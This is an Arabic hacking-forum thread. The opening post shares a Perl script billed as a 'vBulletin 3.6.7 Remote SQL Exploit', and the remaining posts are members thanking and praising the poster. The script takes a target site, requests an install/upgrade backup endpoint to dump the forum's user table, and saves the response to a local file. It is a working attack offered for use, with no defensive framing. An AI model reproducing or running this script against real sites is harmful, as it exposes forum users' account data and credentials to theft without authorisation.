الوسوم:
حالة الموضوع:
مغلق
  1. mr.grey hat

    mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    بسم الله الرحمن الرحيم

    أسم الثغرة : vBulletin 3.6.7 Remote SQL Exploit
    مكتشف الثغرة : Hani Xavi
    المصدر : vBulletin 3.6.7 Remote SQL Exploit

    الاستغلال:
    [SQL]
    vBulletin 3.6.7 Remote SQL Exploit By Hani Xavi



    U need To Watch The Vidéo :) : https://www.youtube.com/watch?v=X1nZmwPrzQI



    #!/usr/bin/perl

    use LWP::UserAgent;

    use HTTP::Request;

    system("clear");

    print "------------------------------------------------\n";

    print " vBulletin 3.6.7 Exploit \n";

    print " Coded by Hani Xavi \n";

    print "------------------------------------------------\n";

    $target = $ARGV[0];

    $path = $ARGV[1];

    if($target eq '')

    {

    print "[*] Usage: perl vb.pl <target> <path> \n";

    exit(1);

    }



    if($target !~ /http:\/\//)

    {

    $target = "http://$target";

    }

    sleep 1;

    print "[*] Exploiting . . \n";

    $agent = LWP::UserAgent->new();

    $agent->agent('Mozilla/5.0(X11; Linux x86_64) AppleWebKit/5320 (KHTML, like Gecko) Chrome/13.0.819.0 Safari/5320');

    $website = "$target/$path/install/upgrade_301.php?step=backup&do=sqltable&table=user";

    $req = $agent->request(HTTP::Request->new(GET=>$website));

    if($req->is_success)

    {

    open(FILE, "> vBulletin_content.txt");

    print FILE $req->content;

    close(FILE);

    print "[*] Exploit sent ! Look in the file 'vBulletin_content.txt' :) \n";

    }

    else

    {

    print "[-] Exploit not sent . \n";

    }
    [/SQL]
     
  2. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    رد: vBulletin 3.6.7 Remote SQL Exploit

    وعليكم السلام
    بارك الله بيك
     
  3. mr.grey hat

    mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: vBulletin 3.6.7 Remote SQL Exploit

    وبيك أخي الكريم وشكرا على المرور ​
     
  4. saudi-hack

    saudi-hack Developer

    الأنتساب:
    ‏30 أغسطس 2012
    المشاركات:
    105
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الإقامة:
    الـــريآضض
    رد: vBulletin 3.6.7 Remote SQL Exploit

    الله يعطيك العافية و يخليك إن شاء الله
     
  5. KhaLaF

    KhaLaF V • I • P

    الأنتساب:
    ‏13 يوليو 2014
    المشاركات:
    667
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    الجنس:
    ذكر
    الوظيفة:
    طـآلـب
    الإقامة:
    (-مـEgypTـصر-)
    رد: vBulletin 3.6.7 Remote SQL Exploit

    كم أنت مبدع
    :ُae@: :ُae@:
     
  6. mr.grey hat

    mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: vBulletin 3.6.7 Remote SQL Exploit

    مشكورين أخواني على المرور نورتو صفحتي ​
     
  7. LiMoO

    LiMoO Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    54
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    الوظيفة:
    مطور مواقع
    الإقامة:
    المحروسـهـ
    رد: vBulletin 3.6.7 Remote SQL Exploit

    الله يعطيك الصحة أخي :ُeُe.1:
     
  8. mr.grey hat

    mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: vBulletin 3.6.7 Remote SQL Exploit

    أمين وياك ي أخ LiMoO مشكور على مرورك ​
     
  9. G3niUs.M4n

    G3niUs.M4n Developer

    الأنتساب:
    ‏14 مايو 2012
    المشاركات:
    58
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    جــــدهـ ~
    رد: vBulletin 3.6.7 Remote SQL Exploit

    بارك الله بك و نفع بك
     
  10. mr.grey hat

    mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    رد: vBulletin 3.6.7 Remote SQL Exploit

    أمين وياك ي رب ومشكور أخوي G3niUs.M4n على مرورك العطر ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة